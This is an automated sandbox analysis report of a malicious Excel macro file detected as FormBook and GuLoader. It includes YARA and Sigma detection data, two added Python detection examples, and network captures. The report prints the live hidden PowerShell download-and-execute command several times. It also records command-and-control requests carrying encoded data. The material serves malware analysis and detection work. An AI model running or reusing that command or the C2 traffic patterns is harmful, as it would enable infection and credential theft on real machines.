Analysis Report Rechnungsbeleg.xlsm

Overview

General Information

Sample Name: Rechnungsbeleg.xlsm
Analysis ID: 278329
MD5: 13d68c90dfd6581f051e7cd69170d6b9
SHA1: 5637ff31e6eecaf0d6bfc20caa8ae4adde8dd69c
SHA256: e02e2804d98658cc76ef89c09f52f66843e68cb94f7578f1ff856aa4999a3c19

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download file and shellexecute
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Bypasses PowerShell execution policy
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Download from URL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 1200 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • powershell.exe (PID: 6016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • svchost.exe (PID: 6220 cmdline: 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: BFC7596ECD06A9D619DBD482631B0D84)
        • svchost.exe (PID: 6408 cmdline: 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: BFC7596ECD06A9D619DBD482631B0D84)
          • explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • svchost.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
              • cmd.exe (PID: 6000 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
                • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(15 entries in total; the remaining entries are not shown here.)
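The hex strings above are what the two community rules key on. The Python below is an added example, not code from the report or from the rule authors: it scans a buffer for exactly those byte sequences, decodes the two instruction forms they contain (0F 31 is x86 RDTSC, the instruction behind the report's "Tries to detect virtualization through RDTSC time measurements" finding; 68 imm32 is push imm32, so each JPCERT string is a push of a 32-bit constant that the rule's own names associate with sqlite3 APIs) and renders the strings as YARA rule text a scanner can compile. Only the byte sequences come from the page; the rule name, the condition and the NOP-filled sample buffer are assumptions made for this example.

```python
from typing import Dict, List, Optional

# Byte sequences copied from the report's Yara matches: the ten $sequence_N
# strings of Formbook_1 (yara-signator) and the three push-immediate strings
# of JPCERT/CC's Formbook rule. The rule name, the condition and the sample
# buffer below are assumptions for this example, not the original rules.
FORMBOOK_SEQUENCES = {
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
JPCERT_PUSHES = {
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def hex_to_bytes(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf: bytes, patterns: Dict[str, str]) -> Dict[str, List[int]]:
    """Return {name: [offsets]} for every pattern that occurs in buf (overlaps included)."""
    hits: Dict[str, List[int]] = {}
    for name, hexstr in patterns.items():
        needle = hex_to_bytes(hexstr)
        pos, offsets = 0, []
        while (pos := buf.find(needle, pos)) != -1:
            offsets.append(pos)
            pos += 1
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(pattern: bytes) -> Optional[int]:
    """Decode '68 imm32' (x86 push imm32, little-endian); all JPCERT strings have this form."""
    if len(pattern) == 5 and pattern[0] == 0x68:
        return int.from_bytes(pattern[1:], "little")
    return None


def uses_rdtsc(pattern: bytes) -> bool:
    """0F 31 is x86 RDTSC, used for the timing checks the report flags."""
    return b"\x0f\x31" in pattern


def to_yara(rule_name: str, patterns: Dict[str, str], condition: str) -> str:
    """Render the hex strings as YARA rule text; the condition is the caller's choice."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for name, hexstr in patterns.items():
        lines.append(f"        ${name} = {{ {hexstr} }}")
    lines += ["    condition:", f"        {condition}", "}"]
    return "\n".join(lines)


def build_sample() -> bytes:
    """Constructed buffer: NOP filler with report sequences planted at known offsets."""
    buf = bytearray(b"\x90" * 0x100)
    seq0 = hex_to_bytes(FORMBOOK_SEQUENCES["sequence_0"])
    buf[0x10:0x10 + len(seq0)] = seq0
    buf[0x80:0x80 + len(seq0)] = seq0  # two copies, as in the report's dump
    step = hex_to_bytes(JPCERT_PUSHES["sqlite3step"])
    buf[0x40:0x40 + len(step)] = step
    return bytes(buf)


if __name__ == "__main__":
    all_patterns = {**FORMBOOK_SEQUENCES, **JPCERT_PUSHES}
    sample = build_sample()
    for name, offsets in scan(sample, all_patterns).items():
        raw = hex_to_bytes(all_patterns[name])
        imm = push_imm32(raw)
        note = "contains RDTSC" if uses_rdtsc(raw) else (f"push 0x{imm:08X}" if imm is not None else "")
        print(f"${name}: {[hex(o) for o in offsets]} {note}")
    # Assumed condition; the original rules' conditions are not reproduced in the report.
    print(to_yara("Formbook_report_278329", all_patterns, "7 of ($sequence_*) or all of ($sqlite3*)"))
```

$sequence_0 decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, i.e. a timestamp delta stored to a local, which is why the same bytes match twice in each dump. The push immediates (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are constants the JPCERT rule names after sqlite3_step, sqlite3_column_text and sqlite3_column_blob; the report's "Tries to harvest and steal browser information" signature is the behaviour those lookups serve.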

Sigma Overview

System Summary:

Sigma detected: Powershell download file and shellexecute
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ProcessId: 6016
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ProcessId: 6016
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6016, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 6220
Sigma detected: System File Execution Location Anomaly
Source: Process started | Author: Florian Roth, Patrick Bareiss | Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6016, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 6220
Sigma detected: PowerShell Download from URL
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1200, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y17vWYwU',$env:Temp+'\svchost.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\svchost.exe'), ProcessId: 6016
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 6220, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe' , ProcessId: 6408
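All of the Sigma hits above fire on process-creation telemetry alone. The Python below is an added example (not part of the report and not the Sigma rules themselves) that re-implements their logic over constructed process events built from the report's own process tree: an Office product spawning a shell, a PowerShell command line that both downloads and executes, an execution-policy bypass, and a system-binary name run from outside System32 or SysWOW64. The event layout, the keyword lists and the benign control event (PID 9001) are assumptions; the images, PIDs and command lines are the report's.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 / 4688 style).
# Images, PIDs and command lines are taken from the report's process tree;
# the field layout, keyword lists and the benign control event are assumptions.


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Binaries that only ever run from the Windows system directories.
SYSTEM_ONLY = {"svchost.exe", "conhost.exe", "lsass.exe", "csrss.exe", "services.exe",
               "winlogon.exe", "smss.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|downloaddata|net\.webclient|"
                         r"invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
EXECUTE_RE = re.compile(r"shellexecute|start-process|invoke-expression|\biex\b|invoke-item", re.I)
BYPASS_RE = re.compile(r"-(?:executionpolicy|ep)\s+bypass|-w(?:indowstyle)?\s+hidden", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(ev: ProcEvent) -> bool:
    """Analogue of 'Microsoft Office Product Spawning Windows Shell'."""
    return basename(ev.parent_image) in OFFICE_IMAGES and basename(ev.image) in SHELL_IMAGES


def powershell_download_execute(ev: ProcEvent) -> bool:
    """A download primitive and an execute primitive in one PowerShell command line."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return bool(DOWNLOAD_RE.search(ev.cmdline) and EXECUTE_RE.search(ev.cmdline))


def execution_policy_bypass(ev: ProcEvent) -> bool:
    return basename(ev.image) in {"powershell.exe", "pwsh.exe"} and bool(BYPASS_RE.search(ev.cmdline))


def system_binary_outside_system_dir(ev: ProcEvent) -> bool:
    """Analogue of 'System File Execution Location Anomaly' / 'Suspicious Svchost Process'."""
    return basename(ev.image) in SYSTEM_ONLY and not ev.image.lower().startswith(SYSTEM_DIRS)


RULES = {
    "office_spawns_shell": office_spawns_shell,
    "powershell_download_execute": powershell_download_execute,
    "execution_policy_bypass": execution_policy_bypass,
    "system_binary_outside_system_dir": system_binary_outside_system_dir,
}


def triage(events):
    """Return {pid: set of rule names that fired} for every event."""
    return {ev.pid: {name for name, rule in RULES.items() if rule(ev)} for ev in events}


PS_CMD = ("'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' -executionpolicy bypass "
          "-W Hidden -command (new-object System.Net.WebClient).DownloadFile("
          "'http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126"
          "&authkey=AIuP0x-y17vWYwU',$env:Temp+'\\svchost.exe');"
          "(New-Object -com Shell.Application).ShellExecute($env:Temp+'\\svchost.exe')")
EXCEL = "C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE"
PS_IMAGE = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
TEMP_SVCHOST = "C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe"

SAMPLE_EVENTS = [
    ProcEvent(6016, PS_IMAGE, PS_CMD, EXCEL),
    ProcEvent(6220, TEMP_SVCHOST, f"'{TEMP_SVCHOST}'", PS_IMAGE),
    ProcEvent(6408, TEMP_SVCHOST, f"'{TEMP_SVCHOST}'", TEMP_SVCHOST),
    ProcEvent(7088, "C:\\Windows\\SysWOW64\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe",
              "C:\\Windows\\explorer.exe"),
    # Constructed benign control: an admin running Get-Process from Explorer.
    ProcEvent(9001, PS_IMAGE, "powershell.exe -NoProfile -Command Get-Process", "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, sorted(hits) or "-")
```

Note what process creation alone cannot see: the svchost.exe at PID 7088 runs from the genuine SysWOW64 path under explorer.exe and trips none of these rules, yet it is the process the report shows talking to the C2 hosts. Catching that stage needs the injection-level signatures further down (thread context modification, APC queueing, a system process opening network connections), not command-line matching.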

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Avira: detection malicious, Label: TR/Injector.wuyab
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | ReversingLabs: Detection: 18%
Multi AV Scanner detection for submitted file
Source: Rechnungsbeleg.xlsm | Virustotal: Detection: 21%
Source: Rechnungsbeleg.xlsm | ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.320734091.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.480335249.0000000002D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.476816633.0000000000190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.325100050.000000001E460000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Rechnungsbeleg.xlsm | Joe Sandbox ML: detected
Source: 4.0.svchost.exe.400000.0.unpack | Avira: Label: TR/Injector.wuyab
Source: 6.0.svchost.exe.400000.0.unpack | Avira: Label: TR/Injector.wuyab
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 16_2_02D5E572
Source: global traffic | DNS query: name: onedrive.live.com
Source: global traffic | TCP traffic: 192.168.2.5:49731 -> 192.64.119.224:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 64.32.22.102:80 -> 192.168.2.5:49733
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 64.32.22.102:80 -> 192.168.2.5:49734
Source: global traffic | HTTP traffic detected: GET /d2w/?pvj01lRX=/65nfF/Nxm10NrnhIxqp1OrccA5CCv2C4tVcC1Dq4jiYYSyOmWBHNW0BaFzMFPrna1Df&FD=9rX8FzT0 HTTP/1.1 | Host: www.equifaxsecurity.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d2w/?pvj01lRX=v+VcEx2Oat8H1YXXcMhJ7KJgBNn6b4Axe2Hid9VQh65hvLdlnlM3p4DL0Zb2+MwuG01o&FD=9rX8FzT0 HTTP/1.1 | Host: www.getscholardollars.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: global trafficHTTP traffic detected: POST /d2w/ HTTP/1.1Host: www.getscholardollars.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.getscholardollars.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getscholardollars.com/d2w/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 76 6a 30 31 6c 52 58 3d 6e 63 5a 6d 61 52 36 47 53 73 51 58 72 4b 71 67 4a 49 78 58 68 61 31 38 4a 63 4c 51 5a 6f 41 4f 61 44 57 6c 5a 4d 52 63 6c 59 5a 53 68 6f 39 50 6f 6e 42 55 35 75 44 53 73 75 4c 4e 38 39 55 6b 55 7a 52 6c 69 64 6a 78 77 4a 37 44 6a 33 6c 52 48 51 33 2d 31 5a 46 32 4f 46 6c 67 44 46 45 77 41 41 34 4c 68 2d 69 2d 58 6f 61 78 50 39 7a 68 36 62 4a 55 46 53 51 42 68 50 76 43 32 2d 69 6b 49 56 57 5f 4c 77 78 69 47 72 28 43 33 68 54 69 61 63 65 5f 72 4f 65 66 6e 4d 6b 69 35 71 71 56 64 52 54 34 72 31 6e 64 56 54 36 34 65 43 6f 71 51 75 70 4e 38 55 54 74 72 54 6f 79 66 62 70 4b 41 53 64 45 32 41 69 33 6a 4a 43 52 70 42 58 58 67 74 79 30 78 48 65 63 7e 5a 41 31 43 31 70 72 5a 34 4f 56 75 4d 74 64 79 35 6c 64 52 38 61 56 41 57 42 79 53 6d 63 4f 57 44 66 51 39 78 30 38 37 37 45 6c 6d 48 44 78 6c 43 32 6a 28 50 79 61 59 58 79 63 43 62 28 5f 4c 43 52 68 66 55 58 61 48 79 7a 34 67 7a 28 45 69 52 6b 50 49 74 6f 32 45 55 79 71 43 4c 47 57 